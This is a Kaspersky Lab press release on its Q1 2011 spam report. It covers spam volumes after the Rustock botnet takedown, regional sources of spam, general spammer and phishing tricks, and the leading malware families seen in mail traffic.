Botnet closures fail to stem flow of spam in the first quarter of 2011

10 May
Spam News

Kaspersky Lab announces the publication of its quarterly spam report for Q1 2011.

Overview

The closure of the Rustock botnet command centers on 16 March 2011 did not impact spam traffic as dramatically as last year’s Pushdo/Cutwail and Bredolab closures: the quantity of spam fell by 2-3 percentage points for a day or two before bouncing back again. “This could be due to the closure of SpamIt, a large pharmaceutical partner program, and the fact that Rustock, which specialized in pharmaceutical spam, may well have ceased sending out mass mailings at the end of last year. It could be that the botnet was just used for different purposes. It is also possible that the cybercriminals themselves preferred to lie low for a while given the interest in botnets shown by law enforcement agencies in the latter stages of 2010,” explains Darya Gudkova, Head of Content Analysis & Research at Kaspersky Lab.

As a result, the amount of spam detected in mail traffic in the first quarter of 2011 averaged 78.6% - an increase of 1.4 percentage points compared with the previous quarter, though still 6.5 percentage points less than the corresponding figure for last year.

Sources of spam

In Q1 2011, the Asian and Latin American share of the total volume of spam worldwide grew (+2.93 and +3.85 percentage points respectively) while the amount of spam originating from eastern and western Europe fell by 5.64 and 2.36 percentage points respectively. Africa joined the list of the most active spam senders: the volume of unsolicited messages coming from African countries accounted for 3.66% of the worldwide spam total, exceeding that of the USA and Canada. These figures are in line with Kaspersky Lab’s forecasts that botnets would start shifting to regions with less effective or non-existent anti-spam legislation. However, cybercriminal activity suggests that in future botnets will also be developed in better protected regions meaning they will be spread relatively evenly across the globe, much as they are now.

Spammer tricks and techniques

In Q1 of 2011, spammers made use of some tried and tested tricks and techniques to bypass filtering. Sending out spam emails containing a link to a video clip advertising spammer services was one of them. Another trick saw emails that read “Stop sending me spam” allegedly written by an angry recipient of spam. The email was in fact itself spam with a link leading to a spammer’s site. Unfortunately, Q1 saw some tragic events including earthquakes and a major tsunami in Japan. Needless to say, spammers tried to capitalize on these events by tricking users into parting with their money by pretending to be part of the humanitarian relief effort. (A fuller version of events related to the Japanese earthquakes and tsunami is presented in the graph “The Japan Crisis – An IT Security Timeline”.)

Malware in mail traffic

Trojan-Spy.HTML.Fraud.gen maintained its leading position in the Top 10 rating of malicious programs distributed via mail traffic in the first quarter of 2011. This Trojan uses spoofing technology and appears in the form of an HTML page. It comes with a phishing email containing a link to a fake site resembling that of a well-known bank or e-pay system where the user is asked to enter a login and a password that will be used by fraudsters to access his/her confidential data.

The most notable entries in the Top 10 malicious program to spread via email belonged to a mail worm family and accounted for four of the rating’s ten entries. The main purpose of malware such as this is to harvest email addresses and spread themselves via mail traffic

Phishing

In the first quarter of 2011 the volume of phishing emails was very small and accounted for only 0.03% of all mail traffic. PayPal and eBay remained in the unenviable position of being the organizations most frequently targeted by phishers. They were followed by Habbo, Facebook and erstwhile leader HSBC.

“Notably, in the first quarter of 2011 Google services such as Google AdWords and Google Checkout were attacked much less often. The phishers switched their attentions to the highly popular Brazilian social network Orkut which is owned by Google. The attacks on this social network reached 1.96% of the total, putting it in 12th place in the list of organizations most often targeted by phishers,” said Maria Namestnikova, Senior Spam Analyst at Kaspersky Lab. “It is worth mentioning that user accounts belonging to Google’s services, including Orkut, are interconnected. Thus, having acquired credentials for one of these accounts, a cybercriminal can access any Google service registered to the same user.”

View the full version of Spam in the First Quarter of 2011 at www.securelist.com/en.

Infographics “The Japan Crisis – An IT Security Timeline”